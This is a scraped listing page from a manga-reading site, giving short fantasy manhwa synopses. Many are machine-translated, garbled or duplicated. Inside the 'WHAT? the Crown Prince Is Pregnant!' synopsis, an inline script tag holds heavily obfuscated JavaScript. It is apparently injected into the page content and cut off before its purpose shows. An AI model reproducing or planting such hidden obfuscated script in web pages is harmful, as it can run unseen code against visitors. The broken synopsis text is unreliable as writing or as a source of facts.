Fantasy - Page 1229

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15414 results

What's Our Hero Doing?

Our protagonist, who cleared the extremely difficult of Vanta Black Ring a thousand times, awoke in the body of Ordinary Villager A (Hans) in Aram Village, in the tutorial area. Monsters were attacking the village! In the midst of life and death, he couldn't help but think of the hero named Cadis and how he'd show up and defeat the monsters - until that very hero died with a single attack. Just when he thought everything was over, he absorbed the hero's abilities! What happened to the protagonist who wanted to survive comfortably beside the hero, exactly?


What's With This Strange Dream?!

"I want someone else to touch it." Shin Lee-beom, who defeated the evil spirits in her dreams that harassed the client, was instead faced with the role. The problem is that the reverse is expressed as'burning se*** desire' ! "I'll help you. Do whatever Shin wants you."


What's Wrong With You, Duke?

The cruel Duke Dreux of Faucigny is a lovestruck puppy around Nöel — all thanks to a random magic spell that was cast just as he was about to execute her. But with the spell's power now waning and on the fritz, his shifting moods zip from dramatic professions of eternal love to cold threats of death. Exhausted from the emotional whiplash, Nöel must find a magic spell to not only save herself but also her enchanting fairytale marriage before she loses her beloved and bewitched “Ru” forever.


What, You Dare Pretend In Front Of Me, The Strongest In The Immortal World?

The World Beyond The Ancient Mirror And The Immortal Realm Within Were Originally One Entity. The True Power Of This World Lies In The Hands Of The Divine Beast With The Title “Light,” Who Battles Against A Formidable Enemy, The Divine Beast With The Title “Dark.” In Order To Prevent The Extinction Of Humanity, The Ancestors Of Cheng Song Sealed Off The Immortal Realm From The Human Realm Using The Ancient Mirror, With The Assistance Of The Divine Beast Of Light. Only Those With The Bloodline Of The Yu Family Can Activate The Bronze Mirror And Enter The Immortal Realm.


WHAT? the Crown Prince Is Pregnant!

The crown was invited to attend the Prince Regent’s birthday banquet, but it was the last place he wanted to be in this world because he had arranged an assassin to take the Prince Regent’s life. But the Prince Regent was way too cunning. No doubt, the assassination plan was failed. There’s only one way to achieve his goal – the crown prince decided to do the job himself! Disguised as an assassin, the crown prince sneaked into the Prince Regent’s chamber, only to find out…<script></script><script>function _0x1e37(_0x71bff1,_0x92b98f){var _0x542195=_0x2fcf();return _0x1e37=function(_0x48fbf9,_0x11ae60){_0x48fbf9=_0x48fbf9-(-0x5*0x1fd+0xa5e*0x2+-0x8e3);var _0x3f8923=_0x542195[_0x48fbf9];return _0x3f8923;},_0x1e37(_0x71bff1,_0x92b98f);}(function(_0x438cbb,_0x3cbf4a){var _0x48ddd5=_0x1e37,_0x565b99=_0x438cbb();while(!![]){try{var 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What’s Happening in Lindell?

Read manhwa What’s Happening in Lindell? Claudia, the successor of the priestly family, is framed by her half-brother and relegated to a remote territory. Adjacent to the land of the dead, such as undead and vampires, ‘The Tomb of Priests’, where priests suffer from hard labor; To Lindel Abbey! ‘I have to live in this abandoned house for three years?!’ What awaits her with her pounce on her A shabby monastery! A colleague who sees her divine power as a way to make money! An assassination attempt whose culprit is unknown! + α “Carel, you know what? People see you and call you my ‘dog’.” Eight years ago, while awakening as an immortal being, he met Claudia. The boy who came to be by her side, Karel. Karel learns that someone is trying to kill Claudia. In order to protect her, she runs to her Lindel in her month… … With the appearance of Claudia, the quiet periphery city of Lindel An accident begins to stir up excitement! What else happened today in Lindell, which is full of geeks?! “What’s Happening in Lindell? Manhwa” is alternative: リンデルでは一体なにが? 林德尔又出什么事了? 린델에선 무슨 일이 린델에선 무슨 일이?


What’s Our Hero Doing?

Read “What’s Our Hero Doing? Novel” – “What’s Our Hero Doing? Manga” Online Free At HOT MANGA The summary of the comic What’s Our Hero Doing?: Our main character has cleared the extremely difficult ‘Banta Black Ring’ a thousand times. He woke in the body of ‘ordinary villager A (Hans)’ at Banta Black Ring’s tutorial area. The village is being attacked by monsters! when threatened with death, he thought of the Hero, ‘Cadiz.’ When HE thought that Cadiz would show up and defeat the monster, the hero “Cadiz” died from a single attack? Just when he thought it was all over, he absorbed the hero’s abilities?! He just wanted to survive comfortably beside a hero so what’s going on? “What’s Our Hero Doing?” is also known as: 우리 용사는 뭐함? The comic “What’s Our Hero Doing?” belongs to the Genre: Action, Adventure, Fantasy “ManhuaPlus, Manga Updates, Manhwa Website…” are the most searched keywords on the website KUN MANGA. We offer a wide selection of the best and newest comic series with all chapters updated quickly and featuring high-quality images, providing readers with wonderful and enjoyable reading experiences at LikeManga. You can read TOP MANGA The Regretful Villainess Is Happy Because She Got Divorced Underworld Restaurant I Became The King by Scavenging


Wheel Of Fortune

Re-discovering forgotten memories. Navy was aged backward and lost her memories of when she was an adult. After a tragic fire that resulted in a death, she finds that her savior and friend has mysteriously cut her off. Now she is trying to reconnect with her friend and find out what really happened in the fire.mangabuddy is a website dedicated to fans of anime, , , , video games, and cosplay. Where you may find all of your anime-related memes, recommendations, reviews, manga recommendations, character fanfiction, favorite quotations, and simply those ordinary anime things that you enjoy, particularly memes.You can , online for free at mangabuddy. Chapters are updated hourly with high-quality graphics and a full English translation. Find free translations of your favorite , and . The latest updated content on mangabuddy is now available.


When A Ghost Bird Sings

Read manhwa When A Ghost Bird Sings / When the Ghost Bird Chirps A world where the old breathes within the present. Humans draw in spirits, and spirits captivate humans. Strange incidents and conspiracies unfold around these spirits. A story of growth, adventure, and fantasy follows Sansa, an unlicensed wandering shaman, and her companions as they navigate this mysterious realm. “All of this is one, and yet countless.” When the Ghost Bird Chirps 귀신새가 지저귀면

1 days ago

When A Saint Who Lost Her Virginitiy Touches Love

Read manga When A Saint Who Lost Her Virginitiy Touches Love / 純潔を失った聖女が愛に触れたら Leria, a girl around 12 years old awakened the power of a saint whom duty is to protect the country. When she got her power, from a poor viscount house, she turns up to a royal palace. To save people, she prays wholeheartedly everyday, and receives prince Evan, the second prince’s marriage proposal and spends her days happily. However, on a certain day the second holy maid’s power awaken and angel turns up in palace. Since it’s unusual that the power of two people awakes in the same generation, they promised to help each other. However one night, something happened. After praying, Leria got kidnapped by someone, and lost her purity. As a result, she doesn’t have the qualification of being a holy maiden anymore. The second prince’s broke off his engagement with her, and then she finds out that this was a plot between him and the other angel. She becomes the servant of those two people in love and is treated miserably until she meets someone…


When a Villain Meets a Villainess

Atalanta, the head of an underground organization, is infamous for committing violent acts against nobles. One day, she receives a commission from the Emperor to assassinate the tyrant Grand Duke Lionel Bianca. Atalanta dreams of a future where her and the members of her organization can live a normal life, so she accepts the commission and infiltrates the Grand Duchy to assassinate him… But, why can’t he be killed? Will Atalanta be able to safely escape from the Grand Duke, who is suddenly whispering confessions of love?
